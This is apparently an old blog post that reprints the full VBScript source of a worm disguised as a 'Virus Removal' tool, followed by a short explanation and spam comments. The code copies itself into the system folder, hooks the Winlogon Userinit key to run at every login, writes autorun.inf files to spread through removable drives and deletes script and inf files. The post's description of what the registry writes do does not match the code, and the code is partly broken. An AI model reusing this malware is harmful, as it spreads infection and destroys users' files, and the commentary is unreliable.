Friday, May 23, 2008

Inside the virus

Some time ago you might have heard about this virus which automatically put on top of the IE browser. Everybody was furious about it and there came a small software tool which helps to get rid of the virus but that antiviurs tool was also developed by the guy. Pretty good idea to become popular!

The virus was written in Vbscript. Vbscript is the client side scripting language developed by Microsoft. This has the power to alter the configuration of our computer registry. Registry is the configuration database of computer which stores all kind of informations related to our computer. All viruses use this registry to hijack your computer.

Below is the VirusRemoval.vbs file which is the main code of the virus.s

'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'Program developed by
'Sujin Joshi
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf


If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
WriteAll.Write AllFile
set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1

sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
End sub

First this program says that it is the virus removal and the name of the file is also like that to fool the users. Some of the things it does in our system are as follows:

1. It disables the registry: When you go to Run and type "regedit" you cannot see the registry.
2. It puts the string at the title of the browser.
3. It disables the folder option .
4. It disables the task manager which can be used against the running programs.

The virus can be removed using the download page of worldlink but hey the antivirus kept there is also the program developed by Sujin Joshi who developed the virus. If you understand the basic programming then you can understand how computer virus works. But if anyone copies this code and make their own virus then I pesonally not be responsible in anykind of damage.

Use the following link to remove the virus :

Try to learn about the virus and get knowledge how to get rid ot viruses and worms.


Blogger Radhika said...

The blog content is really nice. Thanks for sharing this information. It is really nice. But I want to share the NCVT MIS ITI Result through this page. So please check the ITI Result 2018.
iti result 2018

July 24, 2018 3:27 PM  
Blogger payal said...

Thanks for sharing this information; it is the really nice post. Also, find the Railway Recruitment Board information like exam date, admit card, result etc through the below link.
RRB Patna Admit Card

July 31, 2018 4:38 PM  

Post a Comment

Hello Everyone! This is the place where you can place your comments. Comments are the only thing that encourages a writer to post more blogs. So please leave your comments.

<< Home